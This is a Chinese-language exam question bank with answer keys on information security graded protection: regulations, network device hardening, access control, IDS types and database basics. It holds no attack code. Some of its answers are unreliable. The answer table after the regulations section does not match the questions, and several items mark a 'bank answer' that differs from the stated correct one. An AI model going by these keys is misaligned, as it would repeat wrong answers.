6、强制访问控制策略最显著的特征是_____。( BD ) A.局限性 B.全局性 C.时效性 D.永久性

7、防火墙管理中 具有设定规则的权限。( CD ) A.用户 B.审计员 C.超级管理员 D.普通管理员

8、网络设备进行远程管理时,应采用 协议的方式以防被窃听。 ( AC ) A. SSH B. HTTP C. HTTPS D. Telnet E.FTP

9、网络安全审计系统一般包括( ABC )。 A.网络探测引擎 B.数据管理中心 C审计中心 D声光报警系统

三、判断题

1、双因子鉴别不仅要求访问者知道一些鉴别信息,还需要访问者拥有鉴 别特征。( √ )

2、口令复杂度应有要求,所以复杂的口令可以不用修改。( X )

3、为特权用户设置口令时,应当使用enablepassword命令,该命令用于 设定具有管理权限的口令。( X )

4、在SSL握手信息中,采用了RSA、MD5等加密技术来实现机密性和 数据完整性。( X )

利用数据加密、身份验证和消息完整性验证机制,为网络上数据的传输提供安全性保证

消息传输过程中使用MAC算法来检验消息的完整性

目前主要支持的算法有DES、3DES、AES等

5、VLAN技术是基于应用层和网络层之间的隔离技术。( X )

6、标准访问控制列表通过网络地址和传输中的数据类型进行信息流控 制,且只允许过滤目的地址。( X )

四、简答题(44分)

1、网络安全的网络设备防护的内容是什么?(12分)

答:①、应对登录网络设备的用户进行身份鉴别; ②、应对网络设备管理员的登陆地址进行限制; ③、网络设备用户的标识应唯一; ④、主要网络设备应对同一用户选择两种或者两种以上组合的鉴别技术来进行身份鉴 别; ⑤、身份鉴别信息应具有不易被冒用的特点,口令应有复杂度的要求并定期更换; ⑥、应具有登录失败处理功能,可采取结束回话、限制非法登录次数和当网络登陆连 接超时自动退出等措施; ⑦、当对网络设备进行远程管理时,应采取必要措施防止鉴别信息在网络传输过程中 被窃听; ⑧、应实现设备特权用户的权限分离。

2、入侵检测系统分为哪几种,各有什么特点?(10分)

答:主机型入侵检测系统(HIDS),网络型入侵检测系统(NIDS)。

HIDS一般部署在下述四种情况下:

1 )网络带宽高太高无法进行网络监控

2 )网络带宽太低不能承受网络IDS的开销

3 )网络环境是高度交换且交换机上没有镜像端口

4 )不需要广泛的入侵检测 HIDS往往以系统日志、应用程序日志作为数据源;检测主机上的命令序列比检测 网络流更简单,系统的复杂性也少得多,所以主机检测系统误报率比网络入侵检测系统的误报率要低;他除了检测自身的主机以外,根本不检测网络上的情况,而且对入侵行为分析的工作量将随着主机数量的增加而增加,因此全面部署主机入侵检测系统代价比较大,企业很难将所有主机用主机入侵检测系统保护,只能选择部分主机进行保护,那些未安装主机入侵检测系统的机器将成为保护的忙点,入侵者可利用这些机器达到攻击的目标。依赖于服务器固有的日志和监视能力,。如果服务器上没有配置日志功能,则必须重新配置,这将给运行中的业务系统带来不可预见的性能影响。

NIDS一般部署在比较重要的网段内,它不需要改变服务器等主机的配置,由于他 不会在业务系统的主机中安装额外的软件,从而不会影响这些机器的CPU、I/O与磁盘等资源的使用,不会影响业务系统的性能。NIDS的数据源是网络上的数据包。通过线路窃听的手段对捕获的网络分组进行处理,从中获取有用的信息。一个网段上只需要安装一个或几个这样的系统,便可以检测整个网络的情况,比较容易实现。由于现在网络的日趋复杂和高速网络的普及,这种结构正接受者越来越大的挑战。

3、访问控制的三要素是什么?按访问控制策略划分,可分为哪几类?按层面划分,可分为哪几类?(10分)

答:访问控制的三要素是:

主体,客体,操作。

按访问控制策略划分可分为: 按层面划分分可分为: 1)自主访问控制 1)网络访问控制 2)强制访问控制 2)主机访问控制 3)基于角色的访问控制。 3)应用访问控制 4)物理访问控制

4、安全审计按对象不同,可分为哪些类?各类审计的内容又是什么?(12分)

答:系统级审计,应用级审计,用户级审计。 系统级审计:要求至少能够记录登陆结果、登录标识、登陆尝试的日期和时间、退出的日期和时间、所使用的设备、登陆后运行的内容、修改配置文件的请求等。

应用级审计:跟踪监控和记录诸如打开和关闭数据文件,读取、编辑和删除记录或字段的特定操作以及打印报告之类的用户活动。

用户级审计:跟踪通常记录用户直接启动的所有命令、所有的标识和鉴别尝试的所有访问的文件和资源。

一、单选题(每题1.5分,共30分)

1.以下关于等级保护的地位和作用的说法中不正确的是( C )

A.是国家信息安全保障工作的基本制度、基本国策。

B.是开展信息安全工作的基本方法。

C.是提高国家综合竞争力的主要手段。

D.是促进信息化、维护国家信息安全的根本保障。

\2. 以下关于信息系统安全建设整改工作工作方法说法中不正确的是:( A )

A.突出重要系统,涉及所有等级, 试点示范,行业推广,国家强制执行。

B.利用信息安全等级保护综合工作平台使等级保护工作常态化。

C.管理制度建设和技术措施建设同步或分步实施。

D.加固改造 缺什么补什么 也可以进行总体安全建设整改规划。

3.以下关于定级工作说法不正确的是:( A )

A.确定定级对象过程中,定级对象是指以下内容:起支撑、传输作用的信息网络(包括专网、内网、外网、网管系统)以及用于生产、调度、管理、指挥、作业、控制、办公等目的的各类业务系统 。

B.确定信息系统安全保护等级仅仅是指确定信息系统属于五个等级中的哪一个。

C.在定级工作中同类信息系统的安全保护等级不能随着部、 省、市行政级别的降低而降低。

D.新建系统在规划设计阶段应确定等级,按照信息系统等级,同步规划、同步设计、同步实施安全保护技术措施和管理措施。

\4. 安全建设整改的目的是( D )

(1)探索信息安全工作的整体思路;(2)确定信息系统保护的基线要求;(3)了解信息系统的问题和差距;(4)明确信息系统安全建设的目标;(5)提升信息系统的安全保护能力;

A.(1)、(2)、(3)、(5)

B.(3)、(4)、(5)

C.(2)、(3)、(4)、(5)

D.全部

5.下列说法中不正确的是( B )

A. 定级/备案是信息安全等级保护的首要环节。

B. 等级测评是评价安全保护现状的关键。

C. 建设整改是等级保护工作落实的关键。

D. 监督检查是使信息系统保护能力不断提高的保障。

6.配置如下两条访问控制列表:

access-list 1 permit 10.110.10.1 0.0.255.255

access-list 2 permit 10.110.100.100 0.0.255.255

访问控制列表1和2,所控制的地址范围关系是:( A )

A. 1和2的范围相同

B. 1的范围在2的范围内

C. 2的范围在1的范围内

D. 1和2的范围没有包含关系

\7. Oracle数据库中,以下( C )命令可以删除整个表中的数据,并且无法回滚。

A. Drop

B. Delete

C. Truncate

D. Cascade

8.下面哪个不是生成树的优点( D )

A. 生成树可以管理冗余链路,在链路发生故障时可以恢复网络连接

B. 生成树可以防止环路的产生

C. 生成树可以防止广播风暴

D. 生成树能够节省网络带宽

9.关于以下配置

Router ospf 100

Ip router authentication

Ip ospf message-digest-key 1 md5 XXXXXX(认证码)

以下说法不正确的是( C )

A.OSPF认证分为明文认证和密文认证两种方式。

B.OSPF协议是一种典型的链路状态路由协议,它通过路由器之间通过网络接口的状态来建立链路状态数据库,生成最短路径树。

C.OSPF的认证可以在链路上进行,也可以在整个区域内进行认证。但是在虚链路上不可以进行认证。

D.该配置可以应用在业务终端与业务服务器之间进行路由控制来建立安全的访问路径。

\10. 防火墙的位置一般为( D )。

A. 内外网连接的关口位置

B. 内网敏感部门的出口位置

C. 非军事区(DMZ)的两侧

D. 以上都对

\11. 关于防火墙的功能,以下( D )描述是错误的

A.防火墙可以检查进出内部网的通信量

B.防火墙可以使用应用网关技术在应用层上建立协议过滤和转发功能

C.防火墙可以使用过滤技术在网络层对数据包进行选择

D.防火墙可以阻止来自内部的威胁和攻击

12.拒绝服务攻击的后果是( D )。

A.信息不可用

B.应用程序不可用

C.系统宕机、阻止通信

D. 上面几项都是

\13. ( A )即非法用户利用合法用户的身份,访问系统资源。

A、身份假冒 B、信息窃取 C、数据篡改 D、越权访问

14.linux主机中关于以下说法不正确的是( C )

A.PASS_MAX_DAYS 90 是指登陆密码有效期为90天。

B.PASS_WARN_AGE 7 是指登陆密码过期7天前提示修改。

C.FALL_DELAY 10 是指错误登陆限制为10次。

D.SYSLOG_SG_ENAB yes 当限定超级用于组管理日志时使用。

15.linux中关于登陆程序的配置文件默认的为( B )

A. /etc/pam.d/system-auth

B. /etc/login.defs

C./etc/shadow

D./etc/passwd

16.linux中要想查看对一个文件的是否具有-rwxr—r—权限,使用的命令为( A )

A.#ls –l /etc/passwd 744

B.#ls –l /etc/shadow 740

C.#ls –l /etc/rc3.d 665

D.#ls –l /etc/inet.conf 700

\17. 若要系统中每次缺省添加用户时,都自动设置用户的宿主目录为/users,需修改哪一个_配置文件?( A )

A./etc/default/useradd

B./etc/login.defs

C./etc/shadow

D./etc/passwd

18.一位系统管理员想通过Telnet对一台运行Windows Server 2003的服务器进行远程的管理和维护,为了达到这个目的他想启动Telnet服务,但当他打开服务控制台中的Telnet服务属性时发现启动按钮不可用,如下图:

![img](file:///C:/Users/herry/AppData/Local/Temp/enhtmlclip/Image.png)img

产生这种情况的原因是( A )。

A.当前Telnet服务的启动类型为禁用

B.C:\WINDOWS\system32\tlnetsvr.exe文件丢失

C.本地组策略限制不允许启动Telnet服务

D.Telnet服务组件没有安装

\19. 小李是公司的网络管理员,公司的计算机处于单域中,他使用的操作系统为Windows Server 2003,由于计算机中有非常重要的资料,因此他想设置一个安全的密码。下面( D )是比较安全的密码

A.xiaoli123

B.13810023556

C.bcdefGhijklm

D.cb^9L2i

20.下列有关SQL Server 2000 中,master 数据库的说法不正确的是( D )

A 用户数据库可以重命名,master数据库不能重命名

B master 数据库 记录SQL server 的 所有系统信息

C master 数据库 在安装SQL server 的过程中自动安装

D 不可以重建master 数据库。

二、不定项选择题(每题2分,多选不得分,少选得一分,共20分)

1.当前我国的信息安全形势为( ABC )

A.遭受敌对势力的入侵、攻击、破坏。

B.针对基础信息网络和重要信息系统的违法犯罪持续上升。

C.全社会的信息安全等级保护意识仍需加强。

D.总体情况尚可,少量的基础信息网络和重要信息系统安全隐患严重。

\2. 以下对信息系统安全建设整改工作的复杂性和艰巨性说法正确的是( ABCD )

A.政策性和技术性很强。

B.涉及范围广。

C.信息系统安全加固改造,需要国家在经费上予以支持

D.跨省全国联网的大系统结构复杂运行实时保障性高、数据重要,加固改造周期长。

\3. 对测评机构不能从事的活动下列说法正确的是( D )

(1)影响被测评信息系统正常运行,危害被测评信息系统安全;

(2)泄露知悉的被测评单位及被测评信息系统的国家秘密和工作秘密;

(3)与客户进行沟通后隐瞒测评过程中发现的安全问题,维护客户关系;

(4)按规定格式出具等级测评报告;

(5)非授权占有、使用等级测评相关资料及数据文件

(6)分包或转包等级测评项目;

(7)信息安全产品开发、销售和信息系统安全集成;

(8)限定被测评单位购买、使用指定的信息安全产品,以达到最佳安全水平。

A.(1)、(2)、(4)、(5)、(8)。

B.(1)、(2)、(3)、(5)、(7)。

C.(1)、(2)、(3)、(4)、(8)。

D.(1)、(2)、(5)、(6)、(7)。

\4. 访问控制列表可实现下列哪些要求( ABDE )

A. 允许202.38.0.0/16网段的主机可以使用协议HTTP访问129.10.10.1

B. 不让任何机器使用Telnet登录

C. 使某个用户能从外部远程登录

D. 让某公司的每台机器都可经由SMTP发送邮件

E. 允许在晚上8:00到晚上12:00访问网络

F. 有选择地只发送某些邮件而不发送另一些文件

\5. 办公网络中计算机的逻辑组织形式可以有两种,工作组和域。下列关于工作组的叙述中正确的是( AC )。

A. 工作组中的每台计算机都在本地存储账户

B. 本计算机的账户可以登录到其它计算机上

C. 工作组中的计算机的数量最好不要超过10台

D. 工作组中的操作系统必须一样

\6. 如果只对主机地址为172.16.30.55进行访问列表的设置,下面各项正确的有( BD )

A.172.16.30.55 0.0.0.255

B.172.16.30.55 0.0.0.0

C.any 172.16.30.55

D.host 172.16.30.55

\7. Oracle中的三种系统文件分别是( ABC )

A.数据文件 DBF

B.控制文件 CTL

C.日志文件 LOG

D.归档文件 ARC

\8. 关于表分区的说法正确的有( AC )

A.表分区存储在表空间中

B.表分区可用于任意的数据类型的表

C.表分区不能用于含有自定义类型的表

D.表分区的每个分区都必须具有明确的上界值

\9. 语句SELECT‘ACCP’FROM DUAL 的执行结果是(A )

A.ACCP

B.X

C.编译错

D.提示未选中行

\10. HASH加密使用复杂的数字算法来实现有效的加密,其算法包括( ABC )

A.MD2;

B.MD4;

C.MD5;

D.Cost256

三、判断题(每题一分、共10分)

\1. 所有等级的信息系统,一般都由信息系统运营使用单位到所在地设区的市级以上公安机关网络安全保卫部门办理备案手续,填写《信息系统安全等级保护备案表》(错 )。

\2. 信息安全是非传统安全,信息安全本质是信息对抗、技术对抗、国家综合实力的对抗。( 错 )

3.在网络设备测评中网络设备应具有登录失败处理功能,可采取结束会话、限制非法登录次数和当网络登录连接超时自动退出等措施。( 对 )

4.在信息安全等级保护的ASG组合中没有S1A4G4这个组合。( 错 )

5.在信息安全等级测评中,《基本要求》是信息系统安全保护的基本“标尺”或达标线,满足《基本要求》意味着信息系统具有相应等级的保护能力,达到了很好的安全状态。( 错 )

\6. 经过安全建设整改工作后,三级信息系统在统一的安全保护策略下具有抵御大规模、较强恶意攻击的能力,抵抗较为严重的自然灾害的能力,防范计算机病毒和恶意代码危害的能力。( 对 )

7.在信息安全等级保护中,第三级信息系统和第四级信息系统都具有强制性。( 对 )

8.考虑到操作方便性和人员复用性,用户角色和权限不一定到最小权限。( 错 )

\9. 在等级测评过程中,应对信息系统的影虎采取两种或两种以上的组合技术对用户身份进行鉴别。( 对 )

\10. 地方测评机构只能上在本地开展测评,不能够去外地测评( 错 )。

四、简答题(共3题,共40分)

1.信息安全等级保护的五个标准步骤是什么?信息安全等级保护的定义是什么?

信息安全等级保护五个等级是怎样定义的?(10分)

(1)信息ff案、安全建设整改、等级测评、监督检查。

(2)对国家秘密信息、法人和其他组织及公民的专有信息以及公开信息和存储、传输、处理这些信息的系统分等级实行安全保护,对信息系统中使用的信息安全产品实行按等级管理,对信息系统中发生的信息安全事件分等级响应、处置。(答出三个分等级即可)

(3)第一级,信息系统受到破坏后,会对公民、法人和其他组织的合法权益造成损害,但不损害国家安全、社会秩序和公共利益。

第二级,信息系统受到破坏后,会对公民、法人和其他组织的合法权益产生严重损害,或者对社会秩序和公共利益造成损害,但不损害国家安全。

第三级,信息系统受到破坏后,会对社会秩序和公共利益造成严重损害,或者对国家安全造成损害。

第四级,信息系统受到破坏后,会对社会秩序和公共利益造成特别严重损害,或者对国家安全造成严重损害。

第五级,信息系统受到破坏后,会对国家安全造成特别严重损害。

\2. 主机按照其规模或系统功能来区分为哪些类?主机安全在测评时会遇到哪些类型操作系统?网络安全三级信息系统的安全子类是什么?三级网络安全的安全审计的内容是什么?。(15分)

1)巨型 大型 中型 小型、微型计算机和单片机。

(2)目前运行在主机上的主流的操纵系统有?

有Windows、Linux、Sun Solaris 、IBM AIX、HP-UX等等

(3)结构安全、访问控制、安全审计、边界完整性检查、入侵防范、恶意代码防范、网络设备防护。

(4)a) 应对网络系统中的网络设备运行状况、网络流量、用户行为等进行日志记录。

​ b) 审计记录应包括:事件的日期和时间、用户、事件类型、事件是否成功及其他与审计相关的信息

​ c) 应能够根据记录数据进行分析,并生成审计报表。

​ d) 应对审计记录进行保护,避免受到未预期的删除、修改或覆盖等。

\3. 数据库常见威胁有哪些?针对于工具测试需要注意哪些内容?(15分)

(1)非授权访问,特权提升、SQL注入、针对漏洞进行攻击、绕过访问控制进行非授权访问等。

(2)工具测试接入测试设备之前,首先要有被测系统人员确定测试条件是否具备。测试条件包括被测网络设备、主机、安全设备等是否都在正常运行,测试时间段是否为可测试时间段等等。接入系统的设备、工具的IP地址等配置要经过被测系统相关人员确认。对于测试过程可能造成的对目标系统的网络流量及主机性能等等方面的影响(例如口令探测可能会造成的帐号锁定等情况),要事先告知被测系统相关人员对于测试过程中的关键步骤、重要证据,要及时利用抓图等取证工具取证。对于测试过程中出现的异常情况(服务器出现故障、网络中断等等)要及时记录测试结束后,需要被测方人员确认被测系统状态正常并签字后离场。

附加题(5分,附件题算入总分)

采取什么措施可以帮助检测到入侵行为?

部署IPS/IDS,使用主机防火墙(软件)、硬件防火墙、在路由交换设备上设置策略、采用审计设备等。

答案:

一、

1.C 2.A 3.A 4.D 5.B

6.A 7.C 8.D 9.C 10.D

11.D 12.D 13.A 14.C 15.B

16.A 17.A 18.A 19.D 20.D

二、不定项选择题

1.ABC 2.ABCD 3.D 4.ABDE 5.AC

6.BD 7.ABC 8.AC 9.A 10.ABC

三、判断题

1.错 2.错 3.对 4.错 5.错

6.对 7.对 8.错 9.对 10.错

四、简答题

1.(1)信息系统定级、备案、安全建设整改、等级测评、监督检查。

(2)对国家秘密信息、法人和其他组织及公民的专有信息以及公开信息和存储、传输、处理这些信息的系统分等级实行安全保护,对信息系统中使用的信息安全产品实行按等级管理,对信息系统中发生的信息安全事件分等级响应、处置。(答出三个分等级即可)

(3)第一级,信息系统受到破坏后,会对公民、法人和其他组织的合法权益造成损害,但不损害国家安全、社会秩序和公共利益。

第二级,信息系统受到破坏后,会对公民、法人和其他组织的合法权益产生严重损害,或者对社会秩序和公共利益造成损害,但不损害国家安全。

第三级,信息系统受到破坏后,会对社会秩序和公共利益造成严重损害,或者对国家安全造成损害。

第四级,信息系统受到破坏后,会对社会秩序和公共利益造成特别严重损害,或者对国家安全造成严重损害。

第五级,信息系统受到破坏后,会对国家安全造成特别严重损害。

2.(1)巨型 大型 中型 小型、微型计算机和单片机。

(2)目前运行在主机上的主流的操纵系统有?

有Windows、Linux、Sun Solaris 、IBM AIX、HP-UX等等

(3)结构安全、访问控制、安全审计、边界完整性检查、入侵防范、恶意代码防范、网络设备防护。

(4)a) 应对网络系统中的网络设备运行状况、网络流量、用户行为等进行日志记录。

​ b) 审计记录应包括:事件的日期和时间、用户、事件类型、事件是否成功及其他与审计相关的信息

​ c) 应能够根据记录数据进行分析,并生成审计报表。

​ d) 应对审计记录进行保护,避免受到未预期的删除、修改或覆盖等。

3.(1)非授权访问,特权提升、SQL注入、针对漏洞进行攻击、绕过访问控制进行非授权访问等。

(2)工具测试接入测试设备之前,首先要有被测系统人员确定测试条件是否具备。测试条件包括被测网络设备、主机、安全设备等是否都在正常运行,测试时间段是否为可测试时间段等等。接入系统的设备、工具的IP地址等配置要经过被测系统相关人员确认。对于测试过程可能造成的对目标系统的网络流量及主机性能等等方面的影响(例如口令探测可能会造成的帐号锁定等情况),要事先告知被测系统相关人员对于测试过程中的关键步骤、重要证据,要及时利用抓图等取证工具取证。对于测试过程中出现的异常情况(服务器出现故障、网络中断等等)要及时记录测试结束后,需要被测方人员确认被测系统状态正常并签字后离场。

附加题

部署IPS/IDS,使用主机防火墙(软件)、硬件防火墙、在路由交换设备上设置策略、采用审计设备等。

一、法律法规

一、单选题

1.根据《信息安全等级保护管理办法》,(A)负责信息安全等级保护工作的监督、检查、指导。

A.公安机关

B.国家保密工作部门

C.国家密码管理部门

2.根据《信息安全等级保护管理办法》,(D)应当依照相关规范和标准督促、检查、指导本行业、本部门或本地区信息系统运营、使用单位的信息安全等级保护工作。

A.公安机关

B.国家保密工作部门

C.国家密码管理部门

D.信息系统的主管部门

3.计算机信息系统安全保护等级根据计算机信息系统在国家安全、经济建设、社会生活中的_______,计算机信息系统受到破坏后对国家安全、社会秩序、公共利益以及公民、法人和其他组织的合法权益的_______等因素确定。(B)

A.经济价值 经济损失

B.重要程度 危害程度

C.经济价值 危害程度

D.重要程度 经济损失

4.对拟确定为(D)以上信息系统的,运营、使用单位或者主管部门应当请国家信息安全保护等级专家评审委员会评审。

A.第一级

B.第二级

C.第三级

D.第四级

5.一般来说,二级信息系统,适用于(D)

A.乡镇所属信息系统、县级某些单位中不重要的信息系统。小型个体、私营企业中的信息系统。中小学中的信息系统。

B.适用于地市级以上国家机关、企业、事业单位内部重要的信息系统;重要领域、重要部门跨省、跨市或全国(省)联网运行的信息系统;跨省或全国联网运行重要信息系统在省、地市的分支系统;各部委官方网站;跨省(市)联接的信息网络等。

C.适用于重要领域、重要部门三级信息系统中的部分重要系统。例如全国铁路、民航、电力等调度系统,银行、证券、保险、税务、海关等部门中的核心系统。

D.地市级以上国家机关、企业、事业单位内部一般的信息系统。例如小的局域网,非涉及秘密、敏感信息的办公系统等。

6.信息系统建设完成后,(A)的信息系统的运营使用单位应当选择符合国家规定的测评机构进行测评合格方可投入使用。

A.二级以上

B.三级以上

C.四级以上

D.五级以上

7.安全测评报告由(D)报地级以上市公安机关公共信息网络安全监察部门。

A.安全服务机构

B.县级公安机关公共信息网络安全监察部门

C.测评机构

D.计算机信息系统运营、使用单位

8.新建( )信息系统,应当在投入运行后( ),由其运营、使用单位到所在地设区的市级以上公安机关办理备案手续。(D)

A.第一级以上30日内

B.第二级以上60日内

C.第一级以上60日内

D.第二级以上30日内

9.根据《广东省计算机信息系统安全保护条例》规定,计算机信息系统的运营、使用单位没有向地级市以上人民政府公安机关备案的,由公安机关处以(D)

A.警告

B.拘留15日

C.罚款1500元

D.警告或者停机整顿

二、多选题

1.根据《关于信息安全等级保护的实施意见》,信息系统安全等级保护应当遵循什么原则?(ABCD)

A.明确责任,共同保护

B.依照标准,自行保护

C.同步建设,动态调整

D.指导监督,保护重点

2.根据《信息安全等级保护管理办法》,关于信息系统安全保护等级的划分,下列表述正确的是(ABCDE)。

A.第一级,信息系统受到破坏后,会对公民、法人和其他组织的合法权益造成损害,但不损害国家安全、社会秩序和公共利益

B.第二级,信息系统受到破坏后,会对公民、法人和其他组织的合法权益产生严重损害,或者对社会秩序和公共利益造成损害,但不损害国家安全

C.第三级,信息系统受到破坏后,会对社会秩序和公共利益造成严重损害,或者对国家安全造成损害

D.第四级,信息系统受到破坏后,会对社会秩序和公共利益造成特别严重损害,或者对国家安全造成严重损害

E.第五级,信息系统受到破坏后,会对国家安全造成特别严重损害

3.根据《广东省计算机信息系统安全保护条例》,计算机信息系统(ABCD)应当同步落实相应的安全措施。

A.规划

B.设计

C.建设

D.维护

4.经测评,计算机信息系统安全状况未达到国家有关规定和标准的要求的,(AB)

A.委托单位应当根据测评报告的建议,完善计算机信息系统安全建设

B.重新提出安全测评委托

C.另行委托其他测评机构进行测评

D.自行进行安全测评

5.根据《广东省信息安全等级测评工作细则》,关于测评和自查工作,以下表述正确的是(ABCD)。

A.第三级计算机信息系统应当每年至少进行一次安全自查和安全测评

B.第四级计算机信息系统应当每半年至少进行一次安全自查和安全测评

C.第五级计算机信息系统应当依据特殊安全要求进行安全自查和安全测评

D.自查报告连同测评报告应当由计算机信息系统运营、使用单位报地级以上市公安机关公共信息网络安全监察部门

6.根据《广东省公安厅关于计算机信息系统安全保护的实施办法》,关于公安机关的进行安全检查的要求,下列表述正确的是(ABCD)。

A.对第三级计算机信息系统每年至少检查一次

B.对第四级计算机信息系统每半年至少检查一次

C.对第五级计算机信息系统,应当会同国家指定的专门部门进行检查

D.对其他计算机信息系统应当不定期开展检查

7.根据《广东省计算机信息系统安全保护条例》,计算机信息系统的运营、使用单位接到公安机关要求整改的通知后拒不按要求整改的,由公安机关处以(CD)。

A.罚款5000元

B.拘留15日

C.警告

D.停机整顿

8.根据《广东省计算机信息系统安全保护条例》规定,第二级以上计算机信息系统的运营、使用单位计算机信息系统投入使用前未经符合国家规定的安全等级测评机构测评合格的 ,由公安机关(ABCDE)。

A.责令限期改正,给予警告

B.逾期不改的,对单位的主管人员、其他直接责任人员可以处五千元以下罚款,对单位可以处一万五千元以下罚款

C.有违法所得的,没收违法所得

D.情节严重的,并给予六个月以内的停止联网、停机整顿的处罚

E.必要时公安机关可以建议原许可机构撤销许可或者取消联网资格

9.根据《广东省公安厅关于计算机信息系统安全保护的实施办法》,信息安全等级测评机构申请备案(AB)

A.一般应当向地级以上市公安机关公共信息网络安全监察部门提出申请

B.承担省直和中央驻粤单位信息安全等级测评工作的机构,直接向省公安厅公共信息网络安全监察部门提出申请

C.一般应当向公安部公共信息网络安全监察部门提出申请

D.一般应当向县级以上市公安机关公共信息网络安全监察部门提出申请

10.根据《信息安全等级保护管理办法》,安全保护等级为第三级以上的计算机信息系统应当选用符合下列条件的安全专用产品:(ABCDE)

A.产品研制、生产单位是由中国公民、法人投资或者国家投资或者控股的,在中华人民共和国境内具有独立的法人资格

B.产品的核心技术、关键部件具有我国自主知识产权

C.产品研制、生产单位及其主要业务、技术人员无犯罪记录

D.产品研制、生产单位声明没有故意留有或者设置漏洞、后门、木马等程序和功能

E.对国家安全、社会秩序、公共利益不构成危害

三、判断题

1.根据《信息安全等级保护管理办法》,第三级信息系统运营、使用单位应当依据国家管理规范和技术标准进行保护,国家有关信息安全职能部门对其信息安全等级保护工作进行强制监督、检查。(×)

2.根据《信息安全等级保护管理办法》,国家保密工作部门负责等级保护工作中有关保密工作的监督、检查、指导(√)

3.根据《信息安全等级保护管理办法》,信息系统的运营、使用单位应当根据本办法和有关标准,确定信息系统的安全保护等级并报公安机关审核批准。(×)

4.根据《信息安全等级保护管理办法》,信息系统的运营、使用单位应当根据已确定的安全保护等级,依照本办法和有关技术标准,使用符合国家有关规定,满足信息系统安全保护等级需求的信息技术产品,进行信息系统建设。(√)

5.根据《信息安全等级保护管理办法》,第十五条 已运营(运行)的第二级以上信息系统,应当在安全保护等级确定后30日内,由其运营、使用单位到所在地设区的市级以上公安机关办理备案手续(√)

6.根据《信息安全等级保护管理办法》,公安机关应当掌握信息系统运营、使用单位的备案情况,发现不符合本办法及有关标准的,应建议其予以纠正。(×)

7.根据《信息安全等级保护管理办法》,公安机关检查发现信息系统安全保护状况不符合信息安全等级保护有关管理规范和技术标准的,应当向运营、使用单位发出整改通知(√)

8.信息系统运营、使用单位应当依照相关规定和标准和行业指导意见自主确定信息系统的安全保护等级。即使有主管部门的,也不必经主管部门审核批准。(×)

答案

序号 1 2 3 4 5 6 7 8 9 10
答案 D B B C A B D B A C
序号 11 12 13 14 15 16 17 18 19 20
答案 D C B A A C C A A A
序号 21 22 23 24 25 26 27 28 29 30
答案 A B B C A A A ABCD ABCD ABCDE

二、实施指南

一、单选题:

  1. 1999年,我国发布的第一个信息安全等级保护的国家标准GB 17859 — 1999,提出将信息系统的安全等级划分为______个等级,并提出每个级别的安全功能要求。

    A.7

    B.8

    C.6

    D.5

  2. 等级保护标准GB 17859主要是参考了______而提出。

    A.欧洲ITSEC

    B.美国TCSEC

    C.CC

    D.BS 7799

  3. 信息安全等级保护的5个级别中,______是最高级别,属于关系到国计民生的最关键信息系统的保护。

    A.强制保护级

    B.专控保护级

    C.监督保护级

    D.指导保护级

    E.自主保护级

  4. 《信息系统安全等级保护实施指南》将______作为实施等级保护的第一项重要内容。

    A.安全定级(正确答案,记住)

    B.安全评估

    C.安全规划(考试题库答案,考试时选)

    D.安全实施

  5. ______是进行等级确定和等级保护管理的最终对象。

    A.业务系统(考试题库答案,考试时选)

    B.功能模块

    C.信息系统(正确答案,记住)

    D.网络系统

  6. 当信息系统中包含多个业务子系统时,对每个业务子系统进行安全等级确定,最终信息系统的安全等级应当由______所确定。

    A.业务子系统的安全等级平均值

    B.业务子系统的最高安全等级

    C.业务子系统的最低安全等级

    D.以上说法都错误

  7. 关于资产价值的评估,______说法是正确的。

    A.资产的价值指采购费用

    B.资产的价值无法估计

    C.资产价值的定量评估要比定性评估简单容易

    D.资产的价值与其重要性密切相关

  8. 安全威胁是产生安全事件的______。

    A.内因

    B.外因

    C.根本原因

    D.不相关因素

  9. 安全脆弱性是产生安全事件的______。

    A.内因

    B.外因

    C.根本原因

    D.不相关因素

  10. 下列关于用户口令说法错误的是______。

    A.口令不能设置为空

    B.口令长度越长,安全性越高

    C.复杂口令安全性足够高,不需要定期修改

    D.口令认证是最常见的认证机制

  11. 如果一个信息系统,其业务信息安全性或业务服务保证性受到破坏后,会对社会秩序和公共利益造成一定损害,但不损害国家安全;本级系统依照国家管理规范和技术标准进行自主保护,必要时,信息安全监管职能部门对其进行指导。那么该信息系统属于等级保护中的______。

    A.强制保护级

    B.监督保护级

    C.指导保护级 (正确答案,记住)

    D.自主保护级 (考试题库答案,考试时选)

  12. 如果一个信息系统,其业务信息安全性或业务服务保证性受到破坏后,会对公民、法人和其他组织的合法权益产生损害,但不损害国家安全、社会秩序和公共利益;本级系统依照国家管理规范和技术标准进行自主保护。那么其在等级保护中属于______。

    A.强制保护级

    B.监督保护级

    C.指导保护级 (考试题库答案,考试时选)

    D.自主保护级 (正确答案,记住)

  13. 如果一个信息系统,主要对象为涉及国家安全、社会秩序和公共利益的重要信息系统,其业务信息安全性或业务服务保证性受到破坏后,会对国家安全、社会秩序和公共利益造成较大损害;本级系统依照国家管理规范和技术标准进行自主保护,信息安全监管职能部门对其进行监督、检查。这应当属于等级保护的______。

    A.强制保护级

    B.监督保护级

    C.指导保护级

    D.自主保护级

  14. 如果一个信息系统,主要对象为涉及国家安全、社会秩序和公共利益的重要信息系统,其业务信息安全性或业务服务保证性受到破坏后,会对国家安全、社会秩序和公共利益造成严重损害;本级系统依照国家管理规范和技术标准进行自主保护,信息安全监管职能部门对其进行强制监督、检查。这应当属于等级保护的______。

    A.强制保护级

    B.监督保护级

    C.指导保护级

    D.自主保护级

  15. 如果一个信息系统,主要对象为涉及国家安全、社会秩序和公共利益的重要信息系统的核心子系统,其业务信息安全性或业务服务保证性受到破坏后,会对国家安全、社会秩序和公共利益造成特别严重损害;本级系统依照国家管理规范和技术标准进行自主保护,国家指定专门部门、专门机构进行专门监督、检查。这应当属于等级保护的______。

    A.专控保护级

    B.监督保护级

    C.指导保护级

    D.自主保护级

  16. 在安全评估过程中,采取______手段,可以模拟黑客入侵过程,检测系统安全脆弱性。

    A.问卷调查

    B.人员访谈

    C.渗透性测试

    D.手工检查

  17. 在需要保护的信息资产中,______是最重要的。

    A.环境

    B.硬件

    C.数据

    D.软件

  18. GB 17859与目前等级保护所规定的安全等级的含义不同,GB 17859中等级划分为现在的等级保护奠定了基础。

    A.正确

    B.错误

  19. 虽然在安全评估过程中采取定量评估能获得准确的分析结果,但是由于参数确定较为困难,往往实际评估多采取定性评估,或者定性和定量评估相结合的方法。

    A.正确

    B.错误

  20. 定性安全风险评估结果中,级别较高的安全风险应当优先采取控制措施予以应对。

    A.正确

    B.错误

  21. 通常在风险评估的实践中,综合利用基线评估和详细评估的优点,将二者结合起来。

    A.正确

    B.错误

